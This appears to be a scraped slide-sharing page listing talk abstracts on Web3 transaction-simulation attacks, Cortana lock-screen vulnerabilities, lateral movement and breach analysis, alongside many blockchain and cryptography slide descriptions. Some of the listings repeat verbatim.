The introduction of Web3 smart contracts has opened unlimited opportunities for decentralized apps (dApps) and users. With smart contracts, anything that can be coded can be deployed by anyone on the blockchain. As a result, in a Web3 environment, the users’ blockchain transactions, previously merely used for sending coins to peers, are now, in fact, Remote Procedure Calls (RPCs) for smart contracts.
The flip side of this expressiveness is that it’s almost impossible to know analytically in advance what would be the outcome of such RPC to an arbitrary smart contract. Attackers abuse this observability gap to trick users into signing transactions that are harmful in reality. This situation bears a close resemblance to the desktop environment: users need to evaluate in advance if a particular program behavior will be benign.
To solve this gap, Web3 security has taken a page out of the desktop’s security book by using a sandbox-style emulation to evaluate the transaction's outcome before it gets sent to the blockchain. In Web3 lingo, such sandbox emulation is referred to as transaction simulation.
In this talk, we will present our newly discovered attack methods against Web3 simulations, including the first-ever Web3 red pill exploits that allow smart contracts to know that they are running in a simulation and as a result, need to behave differently.
We have tested our findings against numerous leading simulation providers in the Ethereum Virtual Machine (EVM) domain and found that they are indeed vulnerable to such attacks. As a result of our responsible disclosure, multiple (currently three) issues were fixed, and we were awarded bug bounties. We will explain these exploits in detail, including the research methodology allowing us to inspect simulators’ inaccessible inner workings.
We will conclude with new and enlightening insights we gained through this research regarding the true capabilities and limitations of Web3 simulations.
Web3 Security: The Blockchain is Your SIEMTal Be'ery
2021’s hottest new tech term, according to TechCrunch, was “definitely Web3”. Web3, as its name suggests, is considered by many as the future of the internet: decentralized, permissionless, and based on modern blockchain technology. While Web3 might have a bright future, it’s in the middle of growing pains: A number of Web3 apps were hacked in 2021, leading to theft of cryptoassets valued at hundreds of millions of US Dollars. In this talk we will present Web3 app technology, dissect new attack surfaces, and suggest new and exciting defense mechanisms.
First, we will dive into the technical details of Web3 applications, showing how Web3 technology opens new attack surfaces by moving app functionality onto the blockchain. We will then analyze these newly-exposed attack surfaces by reviewing a few examples we’ve discovered “in the wild.”
While Web3 exposes new attack surfaces, it also provides novel detection opportunities. Specifically, the public and transparent nature of the blockchain allows security researchers to immediately explore full details of any attack and, as a result, leads to quick and thorough discoveries. This is a paradigm shift in security research, as current practices only allow a few to learn actual attack details, only some portions of which are shared publicly. This shift in transparency allowed us to independently explore the aforementioned attacks.
Furthermore, we believe we can do even better and go beyond rapid post-mortem reports. We will show how the same raw data we had previously used for a post-mortem analysis can be analyzed in real-time (or even ante factum by “taking a peek” into the blocks that have yet to be mined) to detect and even prevent attacks. This capability is enabled by the online nature of the blockchain and its inherent block time delays. In fact, we can import, with relevant modifications, many of the principles and learnings of current web defenses, including Web Application Firewall (WAF) into the realm of blockchain. By doing so, we introduce a scheme for a Web3 Application Firewall (W3AF) which can greatly improve Web3 security and blockchain-based apps.
Bitcoin: A Peer-to-Peer Electronic Cash System
Satoshi Nakamoto
satoshin@gmx.com
www.bitcoin.org
Abstract.
A purely peer-to-peer version of electronic cash would allow online
payments to be sent directly from one party to another without going through a
financial institution. Digital signatures provide part of the solution, but the main
benefits are lost if a trusted third party is still required to prevent double-spending.
We propose a solution to the double-spending problem using a peer-to-peer network.
The network timestamps transactions by hashing them into an ongoing chain of
hash-based proof-of-work, forming a record that cannot be changed without redoing
the proof-of-work. The longest chain not only serves as proof of the sequence of
events witnessed, but proof that it came from the largest pool of CPU power. As
long as a majority of CPU power is controlled by nodes that are not cooperating to
attack the network, they'll generate the longest chain and outpace attackers. The
network itself requires minimal structure. Messages are broadcast on a best effort
basis, and nodes can leave and rejoin the network at will, accepting the longest
proof-of-work chain as proof of what happened while they were gone.
***** Blockchain Training : https://www.edureka.co/blockchain-training *****
This Edureka video on "Blockchain Explained" is to guide you through the fundamentals of the new revolutionary technology called Blockchain and its defining concepts. Below are the topics covered in this tutorial:
1. History of blockchain
2. What is Blockchain
3. Traditional Transaction vs Blockchain
4. How Blockchain Works
5. Benefits of Blockchain
6. Blockchain Transaction Demo
Here is the link to the Blockchain blog series: https://goo.gl/DPoAHR
You can also refer this playlist on Blockchain: https://goo.gl/V5iayd
Web3 Security: The Blockchain is Your SIEMTal Be'ery
2021’s hottest new tech term, according to TechCrunch, was “definitely Web3”. Web3, as its name suggests, is considered by many as the future of the internet: decentralized, permissionless, and based on modern blockchain technology. While Web3 might have a bright future, it’s in the middle of growing pains: A number of Web3 apps were hacked in 2021, leading to theft of cryptoassets valued at hundreds of millions of US Dollars. In this talk we will present Web3 app technology, dissect new attack surfaces, and suggest new and exciting defense mechanisms.
First, we will dive into the technical details of Web3 applications, showing how Web3 technology opens new attack surfaces by moving app functionality onto the blockchain. We will then analyze these newly-exposed attack surfaces by reviewing a few examples we’ve discovered “in the wild.”
While Web3 exposes new attack surfaces, it also provides novel detection opportunities. Specifically, the public and transparent nature of the blockchain allows security researchers to immediately explore full details of any attack and, as a result, leads to quick and thorough discoveries. This is a paradigm shift in security research, as current practices only allow a few to learn actual attack details, only some portions of which are shared publicly. This shift in transparency allowed us to independently explore the aforementioned attacks.
Furthermore, we believe we can do even better and go beyond rapid post-mortem reports. We will show how the same raw data we had previously used for a post-mortem analysis can be analyzed in real-time (or even ante factum by “taking a peek” into the blocks that have yet to be mined) to detect and even prevent attacks. This capability is enabled by the online nature of the blockchain and its inherent block time delays. In fact, we can import, with relevant modifications, many of the principles and learnings of current web defenses, including Web Application Firewall (WAF) into the realm of blockchain. By doing so, we introduce a scheme for a Web3 Application Firewall (W3AF) which can greatly improve Web3 security and blockchain-based apps.
Bitcoin: A Peer-to-Peer Electronic Cash System
Satoshi Nakamoto
satoshin@gmx.com
www.bitcoin.org
Abstract.
A purely peer-to-peer version of electronic cash would allow online
payments to be sent directly from one party to another without going through a
financial institution. Digital signatures provide part of the solution, but the main
benefits are lost if a trusted third party is still required to prevent double-spending.
We propose a solution to the double-spending problem using a peer-to-peer network.
The network timestamps transactions by hashing them into an ongoing chain of
hash-based proof-of-work, forming a record that cannot be changed without redoing
the proof-of-work. The longest chain not only serves as proof of the sequence of
events witnessed, but proof that it came from the largest pool of CPU power. As
long as a majority of CPU power is controlled by nodes that are not cooperating to
attack the network, they'll generate the longest chain and outpace attackers. The
network itself requires minimal structure. Messages are broadcast on a best effort
basis, and nodes can leave and rejoin the network at will, accepting the longest
proof-of-work chain as proof of what happened while they were gone.
***** Blockchain Training : https://www.edureka.co/blockchain-training *****
This Edureka video on "Blockchain Explained" is to guide you through the fundamentals of the new revolutionary technology called Blockchain and its defining concepts. Below are the topics covered in this tutorial:
1. History of blockchain
2. What is Blockchain
3. Traditional Transaction vs Blockchain
4. How Blockchain Works
5. Benefits of Blockchain
6. Blockchain Transaction Demo
Here is the link to the Blockchain blog series: https://goo.gl/DPoAHR
You can also refer this playlist on Blockchain: https://goo.gl/V5iayd
In this presentation, Dmitry Khlebnikov sets forward six broad principles for designing secure IT systems. He also provides a comprehensive overview of "Host-based Security"
this is about international data encryption algorithm. this is first ever ppt which includes its history, encryption , figure, decryption and application.. do share ur views after viewing it if u like..
The following slides explains about elliptic curves, their interpretation over Gallois finite fields, algorithms that reduces arithmetic computational requirements and primarly applications of the ECC.
Cryptography is the science of using mathematics to encrypt and decrypt data. This presentation explains about the cryptography, its history, types i.e. symmetric and asymmetric cryptography.
This Edureka Blockchain technology tutorial will give you an understanding of how blockchain works and what are blockchain technologies. This tutorial helps you to learn following topics:
1. What are Blockchain & Bitcoin
2. Blockchain Technologies
3. Peer to Peer Network
4. Cryptography
5. Proof of Work & Blockchain Program
6. Ethereum & Smart Contracts
7. Blockchain Applications and Use Cases
This "Blockchain Technology Explained" presentation will help you understand what is Blockchain technology, issues with banking system, how bitcoin solved the issues in banking industry, what are the features of Blockchain which include public distributed ledger, proof of work, mining and at the end, you will also see a use case implementation demonstrating Blockchain mining. Blockchain technology today is very robust and there are a lot of aspects like the programming language, distributed ledger, bitcoin cryptocurrency and many more. Now, lets deep dive into these slides and take a look at how Blockchain Technology works in detail.
Below topics are explained in this " Blockchain Technology Explained" presentation:
1. Issues with the current banking system
2. How Bitcoin solved these issues
3. What is Blockchain Technology?
4. Features of Blockchain
- Public distributed ledger
- Proof of work
- Mining
5. Use case - Blockchain mining
Simplilearn’s Blockchain Certification Training has been designed for developers who want to decipher the global craze surrounding Blockchain, Bitcoin and cryptocurrencies. You’ll learn the core structure and technical mechanisms of Bitcoin, Ethereum, Hyperledger and Multichain Blockchain platforms, use the latest tools to build Blockchain applications, set up your own private Blockchain, deploy smart contracts on Ethereum and gain practical experience with real-world projects.
Why learn Blockchain?
Blockchain technology is the brainchild of Satoshi Nakamoto, which enables digital information to be distributed. A network of computing nodes makes up the Blockchain. Durability, robustness, success rate, transparency, incorruptibility are some of the enticing characteristics of Blockchain. By design, Blockchain is a decentralized technology which is used by a global network of the computer to manage Bitcoin transactions easily. Many new business applications will result in the usage of Blockchain such as Crowdfunding, smart contracts, supply chain auditing, Internet of Things(IoT), etc.
The Blockchain Certification Training Course is recommended for:
1. Developers
2. Technologists interested in learning Ethereum, Hyperledger and Blockchain
3. Technology architects wanting to expand their skills to Blockchain technology
4. Professionals curious to learn how Blockchain technology can change the way we do business
5. Entrepreneurs with technology background interested in realizing their business ideas on the Blockchain
The Blockchain Certification Training Course is recommended for:
1. Developers
2. Technologists interested in learning Ethereum, Hyperledger and Blockchain
3. Technology architects wanting to expand their skills to Blockchain technology
4. Professionals curious to learn how Blockchain technology can change the way we do business
Learn more at: https://www.simplilearn.com/
This presentation simplifies Cloud, Cloud Security and Cloud Security Certifications. This includes the following:
- Understanding Cloud
- Understanding Cloud Security using the Risk Management and Cloud Security Control Frameworks
- Cloud Security Certifications
- Key Definitions
Share data across network spread on multiple sites using Distributed Ledger PowerPoint Presentation Slides. Have the transactions public witnesses making cyber attack difficult. Understand the technology of fast and secure transactions. Make your audience understand the concept of decentralized network that lets you share data of so many kinds such as currency, digital values, and database. With the help of distributed ledger PPT presentation slideshow, participants involved in the process can learn to access the recordings shared across the network. This deck comprises of various templates to keep the transparency of electronic cash system such as distributed ledger, working of a distributed ledger, use of a distributed ledger, smart contract, privacy, letter of credit, corporate debt, industrial blockchain benefits, blockchain limitations, etc. These templates are editable. You can use them the way you want. Modify these templates as per your need. Add content and use this deck to send receive data across multiple networks. Download ready-to-use distributed ledger PPT slides now. Our Distributed Ledger Powerpoint Presentation Slides follow a customized display. Get every detail displayed as you desire.
The Walgreens Story: Putting an API Around Their Stores (Webcast)Apigee | Google Cloud
Walgreens made headlines in 2012 by releasing APIs for mobile developers to enable photo printing from smartphones and quickly followed up with an API for prescription drugs. But what's a traditional business like Walgreens doing with an API? Way beyond increased relevance in an Instagram age, the Walgreens story is one of transformation of an entire business model.
Join Joe Rago and Nicholas Eby of Walgreens and Brian Mulloy of Apigee for a discussion of Walgreens' journey through the digital transformation of a century old brick-and-mortar enterprise.
If you can't make to the live webcast, register below and we'll send you a video recording with slides.
We will discuss:
The path to an API - hurdles, decisions, and milestones
- Walgreens APIs - key features and technology
- Developer and partner programs -awareness and integrations
- 3rd Party Developers - gaining awareness and integrations
The presentation include:
-Diffie hellman key exchange algorithm
-Primitive roots
-Discrete logarithm and discrete logarithm problem
-Attacks on diffie hellman and their possible solution
-Key distribution center
Non-fungible tokens (NFTs) are unique digital assets that are verified on a blockchain network, allowing for the creation and ownership of one-of-a-kind digital items, such as artwork, music, videos, and other types of digital content. They are important because they provide a way for digital creators to monetize their work and establish ownership, scarcity, and authenticity of their creations. NFTs have also gained popularity as a form of investment and collectible item, with some NFTs selling for millions of dollars.
This slide deck includes the following sections:
Introduction: Provide a brief overview of what NFTs are and their significance in the digital world.
How NFTs work: Explain the process of creating and verifying NFTs on a blockchain network, including the use of smart contracts and cryptographic hashing.
Types of NFTs: Describe the various types of NFTs that can be created, such as digital artwork, music, videos, and other types of digital content.
Benefits of NFTs: Highlight the benefits of NFTs, including the ability to establish ownership, scarcity, and authenticity of digital assets, as well as their potential as a new source of revenue for creators.
Market trends: Provide an overview of the current state of the NFT market, including recent sales and trends in various industries, such as art, sports, and gaming.
Potential use cases: Discuss potential use cases for NFTs beyond the current market, such as in the areas of identity verification, supply chain management, and digital voting.
Challenges and risks: Acknowledge the challenges and risks associated with NFTs, such as environmental concerns related to blockchain networks and the potential for fraudulent activity.
Conclusion: Summarize the key takeaways of the presentation and emphasize the growing importance of NFTs in the digital world.
Daniel Connelly Ethereum Smart Contract Master's ThesisDaniel Connelly
Ethereum is a unique offshoot of blockchain technologies that incorporates the use of what are called smart contracts or Dapps – small-sized programs that orchestrate financial transactions on the Ethereum blockchain. With this fairly new paradigm in blockchain, however, comes a host of security concerns and a track record that reveals a history of losses in the range of millions of dollars. Since Ethereum is a decentralized entity, these concerns are not allayed as they are in typical financial institutions. For example, there is no Federal Deposit Insurance Corporation (FDIC) to back the investors of these contracts from financial loss as there is with bank depositors. Furthermore, there is also no Better Business Bureau (BBB) or Consumer Reports organization to offer any sort of ratings on these contracts.
However, there exists a well-known method for verifying a program’s integrity; a method called symbolic execution. Such an examination promises to give not only a perspective on the security of Ethereum, but also highlight areas where security experts may need to target to more quickly improve upon the security of this blockchain.
This paper proposes a solution to ensuring security and increasing end user confidence -- a digital registry of smart contracts that have security flaws in them. A rating system for contracts is proposed and the capabilities one has with knowledge of these vulnerabilities is examined. This research attempts to give a picture of the current state of security of Ethereum Smart Contracts by employing symbolic analysis on a portion of the Smart Contracts up until approximately the 8.4 millionth block.
Vulnerabilities in Smart Contracts may be prevalent and, if they are, a registry for enumerating which ones are can be built and potentially used to easily enumerate them.
Simone Bronzini - Weaknesses of blockchain applications - Codemotion Milan 2018Codemotion
Due to the immutability of the ledger and the difficulty to update their consensus rules, Blockchain applications have many critical layers where a bug can cause huge, irreversible fund losses. This talk will shed some light on why and how Blockchain applications are so critical and will discuss past events that led to fund loss or consensus failures due to bugs in critical parts of the code of Bitcoin and Ethereum applications.
In this presentation, Dmitry Khlebnikov sets forward six broad principles for designing secure IT systems. He also provides a comprehensive overview of "Host-based Security"
this is about international data encryption algorithm. this is first ever ppt which includes its history, encryption , figure, decryption and application.. do share ur views after viewing it if u like..
The following slides explains about elliptic curves, their interpretation over Gallois finite fields, algorithms that reduces arithmetic computational requirements and primarly applications of the ECC.
Cryptography is the science of using mathematics to encrypt and decrypt data. This presentation explains about the cryptography, its history, types i.e. symmetric and asymmetric cryptography.
This Edureka Blockchain technology tutorial will give you an understanding of how blockchain works and what are blockchain technologies. This tutorial helps you to learn following topics:
1. What are Blockchain & Bitcoin
2. Blockchain Technologies
3. Peer to Peer Network
4. Cryptography
5. Proof of Work & Blockchain Program
6. Ethereum & Smart Contracts
7. Blockchain Applications and Use Cases
This "Blockchain Technology Explained" presentation will help you understand what is Blockchain technology, issues with banking system, how bitcoin solved the issues in banking industry, what are the features of Blockchain which include public distributed ledger, proof of work, mining and at the end, you will also see a use case implementation demonstrating Blockchain mining. Blockchain technology today is very robust and there are a lot of aspects like the programming language, distributed ledger, bitcoin cryptocurrency and many more. Now, lets deep dive into these slides and take a look at how Blockchain Technology works in detail.
Below topics are explained in this " Blockchain Technology Explained" presentation:
1. Issues with the current banking system
2. How Bitcoin solved these issues
3. What is Blockchain Technology?
4. Features of Blockchain
- Public distributed ledger
- Proof of work
- Mining
5. Use case - Blockchain mining
Simplilearn’s Blockchain Certification Training has been designed for developers who want to decipher the global craze surrounding Blockchain, Bitcoin and cryptocurrencies. You’ll learn the core structure and technical mechanisms of Bitcoin, Ethereum, Hyperledger and Multichain Blockchain platforms, use the latest tools to build Blockchain applications, set up your own private Blockchain, deploy smart contracts on Ethereum and gain practical experience with real-world projects.
Why learn Blockchain?
Blockchain technology is the brainchild of Satoshi Nakamoto, which enables digital information to be distributed. A network of computing nodes makes up the Blockchain. Durability, robustness, success rate, transparency, incorruptibility are some of the enticing characteristics of Blockchain. By design, Blockchain is a decentralized technology which is used by a global network of the computer to manage Bitcoin transactions easily. Many new business applications will result in the usage of Blockchain such as Crowdfunding, smart contracts, supply chain auditing, Internet of Things(IoT), etc.
The Blockchain Certification Training Course is recommended for:
1. Developers
2. Technologists interested in learning Ethereum, Hyperledger and Blockchain
3. Technology architects wanting to expand their skills to Blockchain technology
4. Professionals curious to learn how Blockchain technology can change the way we do business
5. Entrepreneurs with technology background interested in realizing their business ideas on the Blockchain
The Blockchain Certification Training Course is recommended for:
1. Developers
2. Technologists interested in learning Ethereum, Hyperledger and Blockchain
3. Technology architects wanting to expand their skills to Blockchain technology
4. Professionals curious to learn how Blockchain technology can change the way we do business
Learn more at: https://www.simplilearn.com/
This presentation simplifies Cloud, Cloud Security and Cloud Security Certifications. This includes the following:
- Understanding Cloud
- Understanding Cloud Security using the Risk Management and Cloud Security Control Frameworks
- Cloud Security Certifications
- Key Definitions
Share data across network spread on multiple sites using Distributed Ledger PowerPoint Presentation Slides. Have the transactions public witnesses making cyber attack difficult. Understand the technology of fast and secure transactions. Make your audience understand the concept of decentralized network that lets you share data of so many kinds such as currency, digital values, and database. With the help of distributed ledger PPT presentation slideshow, participants involved in the process can learn to access the recordings shared across the network. This deck comprises of various templates to keep the transparency of electronic cash system such as distributed ledger, working of a distributed ledger, use of a distributed ledger, smart contract, privacy, letter of credit, corporate debt, industrial blockchain benefits, blockchain limitations, etc. These templates are editable. You can use them the way you want. Modify these templates as per your need. Add content and use this deck to send receive data across multiple networks. Download ready-to-use distributed ledger PPT slides now. Our Distributed Ledger Powerpoint Presentation Slides follow a customized display. Get every detail displayed as you desire.
The Walgreens Story: Putting an API Around Their Stores (Webcast)Apigee | Google Cloud
Walgreens made headlines in 2012 by releasing APIs for mobile developers to enable photo printing from smartphones and quickly followed up with an API for prescription drugs. But what's a traditional business like Walgreens doing with an API? Way beyond increased relevance in an Instagram age, the Walgreens story is one of transformation of an entire business model.
Join Joe Rago and Nicholas Eby of Walgreens and Brian Mulloy of Apigee for a discussion of Walgreens' journey through the digital transformation of a century old brick-and-mortar enterprise.
If you can't make to the live webcast, register below and we'll send you a video recording with slides.
We will discuss:
The path to an API - hurdles, decisions, and milestones
- Walgreens APIs - key features and technology
- Developer and partner programs -awareness and integrations
- 3rd Party Developers - gaining awareness and integrations
The presentation include:
-Diffie hellman key exchange algorithm
-Primitive roots
-Discrete logarithm and discrete logarithm problem
-Attacks on diffie hellman and their possible solution
-Key distribution center
Non-fungible tokens (NFTs) are unique digital assets that are verified on a blockchain network, allowing for the creation and ownership of one-of-a-kind digital items, such as artwork, music, videos, and other types of digital content. They are important because they provide a way for digital creators to monetize their work and establish ownership, scarcity, and authenticity of their creations. NFTs have also gained popularity as a form of investment and collectible item, with some NFTs selling for millions of dollars.
This slide deck includes the following sections:
Introduction: Provide a brief overview of what NFTs are and their significance in the digital world.
How NFTs work: Explain the process of creating and verifying NFTs on a blockchain network, including the use of smart contracts and cryptographic hashing.
Types of NFTs: Describe the various types of NFTs that can be created, such as digital artwork, music, videos, and other types of digital content.
Benefits of NFTs: Highlight the benefits of NFTs, including the ability to establish ownership, scarcity, and authenticity of digital assets, as well as their potential as a new source of revenue for creators.
Market trends: Provide an overview of the current state of the NFT market, including recent sales and trends in various industries, such as art, sports, and gaming.
Potential use cases: Discuss potential use cases for NFTs beyond the current market, such as in the areas of identity verification, supply chain management, and digital voting.
Challenges and risks: Acknowledge the challenges and risks associated with NFTs, such as environmental concerns related to blockchain networks and the potential for fraudulent activity.
Conclusion: Summarize the key takeaways of the presentation and emphasize the growing importance of NFTs in the digital world.
Daniel Connelly Ethereum Smart Contract Master's ThesisDaniel Connelly
Ethereum is a unique offshoot of blockchain technologies that incorporates the use of what are called smart contracts or Dapps – small-sized programs that orchestrate financial transactions on the Ethereum blockchain. With this fairly new paradigm in blockchain, however, comes a host of security concerns and a track record that reveals a history of losses in the range of millions of dollars. Since Ethereum is a decentralized entity, these concerns are not allayed as they are in typical financial institutions. For example, there is no Federal Deposit Insurance Corporation (FDIC) to back the investors of these contracts from financial loss as there is with bank depositors. Furthermore, there is also no Better Business Bureau (BBB) or Consumer Reports organization to offer any sort of ratings on these contracts.
However, there exists a well-known method for verifying a program’s integrity; a method called symbolic execution. Such an examination promises to give not only a perspective on the security of Ethereum, but also highlight areas where security experts may need to target to more quickly improve upon the security of this blockchain.
This paper proposes a solution to ensuring security and increasing end user confidence -- a digital registry of smart contracts that have security flaws in them. A rating system for contracts is proposed and the capabilities one has with knowledge of these vulnerabilities is examined. This research attempts to give a picture of the current state of security of Ethereum Smart Contracts by employing symbolic analysis on a portion of the Smart Contracts up until approximately the 8.4 millionth block.
Vulnerabilities in Smart Contracts may be prevalent and, if they are, a registry for enumerating which ones are can be built and potentially used to easily enumerate them.
Simone Bronzini - Weaknesses of blockchain applications - Codemotion Milan 2018Codemotion
Due to the immutability of the ledger and the difficulty to update their consensus rules, Blockchain applications have many critical layers where a bug can cause huge, irreversible fund losses. This talk will shed some light on why and how Blockchain applications are so critical and will discuss past events that led to fund loss or consensus failures due to bugs in critical parts of the code of Bitcoin and Ethereum applications.
Stefano Maestri - Blockchain and smart contracts, what they are and why you s...Codemotion
After a brief introduction on what is blockchain technology and how it works under the wood, focusing on Ethereum the next generation blockchain implementation. We will focus on the concept of smart contract introducing it through a simple case study and its standard implementation in ethereum. We will code it using Solidity language deploying and testing it in a live demo on Ethereum test network.
Best practices to build secure smart contractsGautam Anand
- Quick update in blockchain tech space
- Comparision between tech
- Security in Blockchain (Focusing on ETH Solidity attack vectors)
- Design patterns
- 2 Popular hacks (Case study)
Tucson Blockchain Devs meetup June 7 and O'Reilly Fluent 2018. Some things to consider if you're starting to think about how to integrate with blockchains.
How to Create Blockchain Products by Fr8 Network Lead EngineerProduct School
Blockchain has swept the tech space by storm and we are now seeing the first wave of products built using this technology. One of the biggest challenges with blockchain is taking very technical concepts, such as signing transactions, and making them intuitive and easy to use.
In this talk, Yev discussed the tools, design decisions, and best practices involved when creating a blockchain product.
This presentation is part of New Product Developers (NPD) meetup regularly conducted by Divum. In this session, we covered gentle introduction to blockchain to running a truly decentralised Pizza ordering application built using solidity on ethereum.
Blockchain has gained lots of attention in recent years. Bitcoin and Ethereum are leading the race. Crypto currencies in spite of uncertainty and volatility are here to stay. Smart contract programming is the future for the Internet 3.0.
Learn the basics of Blockchain technology here. Blockchain is the new disruptive technology around. These slides were used for the session hosted by GTech µLearn with Travancore Analytics.
Smart contract honeypots for profit (and fun) - bhaPolySwarm
Ethereum smart contracts have bugs: a lot of them. So many, in fact, that attackers have flocked to exploit them, but occasionally they lose money themselves. Malicious contracts that look vulnerable but are exploitative are a rising trend, and this talk will discuss how they work and what they do.
How to Create Blockchain Products by Slice.Market CTOProduct School
Main takeaways:
-Intro to blockchain concepts, public/private keys, signing transactions, wallets,
-Product challenges unique to blockchain
-Metamask and other tools that people currently use to interact with the Ethereum blockchain
-Common design and product considerations when making a blockchain product
Blockchain and smart contracts, what they are and why you should really care ...maeste
After a brief introduction on what is blockchain technology and how it works under the wood, focusing on Ethereum the next generation blockchain implementation. We will focus on the concept of smart contract introducing it through a simple case study and its standard implementation in ethereum. We will code it using Solidity language deploying and testing it in a live demo on Ethereum test network.
Decentralized Finance (DeFi) is one of today’s most compelling crypto narratives and Compound is one of its most prominent examples. ZenGo research team has taken a deeper look into one of the most intriguing and novel aspects of the Compound protocol, the Liquidation process.
This whitepaper (originally published on early 2020) offers a step-by-step technological explanation and financial survey of Compound’s Liquidation process and thus offers a learning opportunity on a prominent DeFi project, relevant for both experts and beginners.
Elliptic Curve Cryptography (ECC) protects many relevant everyday technologies, including the SSL/TLS protocol that protects our Internet communications and ECDSA signatures that protect Bitcoin and Ethereum transactions against modifications. In this talk we will learn about ECC cryptography, using the Billiards game analogy which make ECC understandable even for non-experts. We will describe some attacks against flawed ECC and signatures implementations, including the recent BlueTooth pairing vulnerability discovered by Technion researchers recently
Slides of our Blackhat USA 2018 talk:
Many new devices are trying to fit into our life seamlessly. As a result, there’s a quest for a “universal access methods” for all devices. Voice activation seems to be a natural candidate for the task and many implementations for it surfaced in recent years. A few notable examples are Amazon’s Alexa, Google’s Assistant and Microsoft’s Cortana.
The problem starts when these “Universal” access methods, aimed for maximal comfort, meet the very “specific” use-case of the enterprise environment which requires comfort to be balanced with other aspects, such as security. Microsoft Cortana is used on Mobile and IoT devices, but also in the enterprise computers as it comes enabled by default with Windows10 and always ready to respond to users’ commands even when the machine is locked.
Allowing interaction with a locked machine is a dangerous architectural decision, and earlier this year, we exposed the Voice of Esau (VoE) exploit for a Cortana vulnerability. The VoE exploit allowed attackers to take over a locked Windows10 machine by combining voice commands and network fiddling to deliver a malicious payload to the victim machine.
In this presentation, we will reveal the “Open Sesame” vulnerability, a much more powerful vulnerability in Cortana that allows attackers to take over a locked Windows machine and execute arbitrary code. Exploiting the “Open Sesame” vulnerability attackers can view the contents of sensitive files (text and media), browse arbitrary web sites, download and execute arbitrary executables from the Internet, and under some circumstances gain elevated privileges. To make matters even worse, exploiting the vulnerability does not involve ANY external code, nor shady system calls, hence making code focused defenses such as Antivirus, Anti-malware and IPS blind to the attack.
We would conclude by suggesting some defense mechanisms and compensating controls to detect and defend against such attacks.
THE VOICE OF ESAU: HACKING ENTERPRISES THROUGH VOICE INTERFACES Tal Be'ery
Our physical environments become increasingly packed with new, computerized, devices that increase our comfort and productivity and augment our everyday experience. These devices maintain a wealth of new and existing types of sensors into our surroundings and offer new channels of communications between humans and machines (voice, gestures), between machines themselves (new wireless protocol standards) and between machines and their motherships in the cloud.
The coexistence of these new devices and interaction models with our "legacy" IT infrastructure have not escaped the eyes of the digital world's most early adopters – the hackers. In their minds, we've just created so many more gateways into our corporate networks with new types of sensorial data to collect (AKA steal) and subvert, and new protocols and formats to abuse in the process of getting access to corporate assets.
As we researched the potential effect of this trend on enterprise cybersecurity we focused on one specific, much hyped, type of interaction: voice. In particular, we examined the voice interaction capabilities that are most prominent in an enterprise environment – those of Microsoft's voice activated assistance Cortana.
During our research, which will be detailed in this session, we were able to fully demonstrate the following scenarios:
Using voice as a gateway into enterprise: We will expose a previously unknown vulnerability in Microsoft Cortana's voice interface (responsibly disclosed to Microsoft and now patched) that allows close proximity attackers to take over an unattended locked Windows 10 computer.
Using voice for lateral movement: We will show how this attack can be further amplified to allow remote attackers to move laterally within the victim's network.
Systematically subverting information produced and used by sensorial systems: We will analyze, in technical details, the protocol Cortana uses to talk to its cloud and will expose the "Newspeak" tool that utilize this knowledge to fiddle with the protocol for fun (pranks!) and profit (additional custom functionality!), or just monitor it for security purposes.
We will conclude our presentation with some practical suggestions regarding defending against this new breed of threats against enterprise networks and assets.
Automate or Die: How Automation Reshapes CybersecurityTal Be'ery
how automation changes both offensive side and defensive side, focusing on the full automation of targeted attacks. Technical analysis of the orchestration and automation of the Lateral Movement phase with BloodHound and GoFetch tools
The Industrial Revolution of Lateral MovementTal Be'ery
Tal Maor & Tal Be'ery Blackhat USA 2017 talk
Recent advancements in the Targeted Attacks technology, and specifically to the Lateral Movement phase of it, are about to ignite an Industrial Revolution in this field.
The original Industrial Revolution and its use of modern methods of mass production is said to had brought "improvements in the cost, quality, quantity, and variety of goods available". The Lateral Movement Industrial Revolution will have similar effects on the attack side.
Consequently, it will have grave repercussions on the defensive side. As always when facing a stressful situation, defenders can respond either by: Fight, Flight, or Freeze.
In this talk, we will describe these recent advancements in the field of automated Lateral, followed by a demo and the release of 'GoFetch', a new open-source lateral movement automation tool. We will conclude with a discussion on the implications of Lateral Movement industrialization on both attackers and defenders.
The Enemy Within: Stopping Advanced Attacks Against Local UsersTal Be'ery
Advanced targeted attackers utilize compromised credentials in order to move laterally within their victims' network. These compromised credentials may consist of either domain or local credentials. Local credentials, especially those of local admins, are a lucrative target for the attackers as they are less managed (password complexity and change policy) and less monitored (no traffic and logs besides the specific computer).
In this talk, we will cover how advanced attackers are abusing local users' credentials in their attacks, including real examples as captured "in the wild". We would follow with suggested new methods and tools to detect and prevent such attacks.
Most notably, we'd expose a tool that implements a method which allows visibility to local users' activity without installing an agent on the monitored machine. The visibility is based on periodic scans of the local users' directory, the Windows Security Account Manager (SAM), using the standard SAM-Remote (SAMR) protocol, messages and APIs. Using these methods defenders gain visibility to local users' logons, group membership, password change among others. Security applications enabled by this visibility include but are not limited to, abnormal logons detection, abnormal group additions and removal detection and abnormal password changes detection.
In this report, we breakdown the Target attack to 11 detailed steps, beginning with the initial credential theft of Target’s HVAC contractor to the theft of PII and credit cards. Particular attention is given to those steps, unknown until now, such as how the attackers were able to propagate within the network. Throughout this report we highlight pertinent insights into the Tactics, Techniques and Procedures (TTPs4) of the attackers. Finally, we provide recommendations on the needed security measures for mitigating similar advanced targeted attacks.
I wrote this paper on 2014 as the VP of Research for Aorato
Today, the topic of cybersecurity has moved from IT and the datacenter to the highest levels of the boardroom. Attacks and threats have grown substantially more sophisticated in frequency and severity. Attackers reside within an internal network an average of eight months before they are even detected. In the vast majority of attacks, they compromise user credentials and they are increasingly using legitimate IT tools rather than malware.
You are now working under the assumption of a breach. How do you find the attackers--before they cause damage?
In this Blackhat talk we will discuss the TTPs (Tactics Techniques & Procedures) of advanced attackers and how they manifest themselves over the network. We will give a special attention to the Reconnaissance and Lateral Movement phases of the Cyber Kill Chain and discuss how network monitoring can be employed to mitigate these risks.
Client side security course by Tal Be'ery presented for Verint, late 2013 - presentation 1 out of 3
Intro to relevant technologies: HTTP, HTML, HTML5, javascript, same origin policy
Client side security course by Tal Be'ery presented for Verint, late 2013 - presentation 3 out of 3
Non javascript attacks: including CSRF, attacks on SSL, CSS history, clickjacking
Client side security course by Tal Be'ery presented for Verint, late 2013 - presentation 2 out of 3
Script injection attacks: including Cross side scripting, Malvertizing, MITM
One Key to Rule Them All: Detecting the Skeleton Key MalwareTal Be'ery
Identity is one of the cornerstones of application security. On windows domains, identity is managed through Active Directory (AD) Domain service on the Domain Controller (DC). Therefore, it should come as no surprise that advanced attackers are actively targeting the DC.
